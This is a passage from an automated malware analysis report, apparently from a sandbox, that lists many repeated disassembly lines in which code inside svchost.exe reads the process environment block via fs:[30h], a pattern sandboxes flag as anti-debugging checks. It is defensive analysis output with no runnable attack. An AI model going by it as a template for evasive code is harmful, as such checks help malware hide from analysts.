                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
